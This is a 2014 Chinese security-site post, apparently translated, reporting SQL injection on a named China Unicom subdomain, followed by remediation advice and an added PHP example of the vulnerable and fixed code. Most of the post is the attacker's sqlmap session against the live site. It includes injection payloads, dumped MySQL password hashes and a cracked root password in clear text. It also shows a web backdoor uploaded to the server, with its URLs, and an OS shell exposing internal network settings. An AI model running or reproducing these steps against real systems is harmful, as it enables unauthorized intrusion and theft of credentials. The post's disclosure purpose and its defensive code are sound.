
A China Unicom sub-site: MySQL injection with ROOT privileges

Source: 黑吧安全网   Views: 1381   Date: 2014-04-28


PHP + MySQL injection, ROOT privileges, a shell can be obtained; what can be done after that, everybody knows.

I saw this vulnerability on 黑吧安全网, "17WO mobile verification code bypass allows changing any other user's password", so I tested it. The vulnerability still exists and has not been fixed. Then I checked the security of the other subdomains.

A Baidu search for "site:17wo.cn" turns up a probable injection point: http://card.17wo.cn/wap/wap_card.php?id=2548



Throw it at sqlmap:

 

./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password

sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:24:01

[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[14:24:01] [INFO] resuming back-end DBMS 'mysql'
[14:24:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2548 AND 1953=1953

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2548 AND SLEEP(5)
---
[14:24:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:24:02] [INFO] fetching database users password hashes
[14:24:02] [WARNING] reflective value(s) found and filtering out
[14:24:02] [INFO] the SQL query used returns 6 entries
[14:24:02] [INFO] starting 6 threads
[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "pma",""
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "root",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:24:03] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:24:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:24:03] [INFO] starting 4 processes
[14:24:33] [INFO] cracked password 'wise' for user 'root'
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [2]:
password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520
clear-text password: wise
password hash: NULL





The root password falls right out.



Try running a command:

 

[14:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:26:46] [INFO] going to use a web backdoor for command prompt
[14:26:46] [INFO] fingerprinting the back-end DBMS operating system
[14:26:46] [WARNING] reflective value(s) found and filtering out
[14:26:46] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'
[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'
[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique
[14:26:47] [WARNING] unable to upload the file stager on '/'
[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique
[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4
[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique
[14:26:53] [WARNING] unable to upload the file stager on '/wap'
[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique
[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique
[14:27:03] [INFO] heuristics detected web page charset 'utf-8'
[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php
[14:27:06] [INFO] heuristics detected web page charset 'ascii'
[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php
[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] Y
[14:27:17] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---

Windows IP 配置


以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821
IPv4 地址 . . . . . . . . . . . . : 10.123.176.75
子网掩码 . . . . . . . . . . . . : 255.255.255.224
默认网关. . . . . . . . . . . . . : 10.123.176.67

隧道适配器 本地连接* 4:

连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4
本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4
默认网关. . . . . . . . . . . . . : ::

隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
---





No problem at all.



From here on anything goes...



Before submitting this vulnerability I searched 黑吧安全网 and found that someone had already reported a related vulnerability last year. More than half a year later it still isn't fixed. Consider this one more reminder to the party concerned.

Remediation:

First, raise security awareness (a vulnerability this old still unfixed); second, prevent injection and reduce privileges...
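As an added illustration of the two remediation points (not code from the original post or from the site concerned): the string-concatenation pattern that lets `?id=2548 AND SLEEP(5)` reach MySQL, beside a hardened handler that validates and binds the value, plus the least-privilege account that should replace the web app's root login. The table `cards`, its columns, the database `appdb` and the account `wapcard_ro` are assumptions.

```php
<?php
// Added example, not the site's own code. Hypothetical schema: appdb.cards(id, title, body).
//
// Least privilege for the web app's MySQL account (run by a DBA, never from the app):
//   CREATE USER 'wapcard_ro'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT ON appdb.cards TO 'wapcard_ro'@'localhost';
// No FILE privilege means SELECT ... INTO OUTFILE cannot drop a file into htdocs
// even if an injection slips through; setting secure_file_priv in my.cnf adds a
// second layer. Also drop anonymous ('') accounts and any account with an empty
// password, as seen in the hash dump above.

function getCardVulnerable(mysqli $db, string $rawId): ?array {
    // VULNERABLE: the raw query-string value is glued into the SQL text, so
    // "2548 AND 1953=1953" or a UNION ALL SELECT ... is executed as SQL.
    $sql = "SELECT id, title, body FROM cards WHERE id = " . $rawId;
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

function getCardSafe(mysqli $db, string $rawId): ?array {
    // 1. Allow-list validation: a card id is a plain positive integer, nothing else.
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $rawId)) {
        http_response_code(400);
        return null;
    }
    // 2. Prepared statement: the value travels as a bound integer parameter and
    //    is never parsed as part of the SQL text.
    $stmt = $db->prepare("SELECT id, title, body FROM cards WHERE id = ?");
    $id = (int) $rawId;
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Connect as the read-only account; the password comes from the environment,
// not from a hard-coded string in a file under the document root.
$db = new mysqli('localhost', 'wapcard_ro', getenv('DB_PASS') ?: '', 'appdb');
$card = getCardSafe($db, $_GET['id'] ?? '');
if ($card === null) {
    exit('not found');
}
echo htmlspecialchars($card['title'], ENT_QUOTES, 'UTF-8');
```

With the grant above, the sqlmap `--os-shell` step shown in the post fails at the file-stager upload stage even when injection is present, which is the "reduce privileges" half of the fix.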


Article URL: https://top.cnzzla.com/artinfo/672.html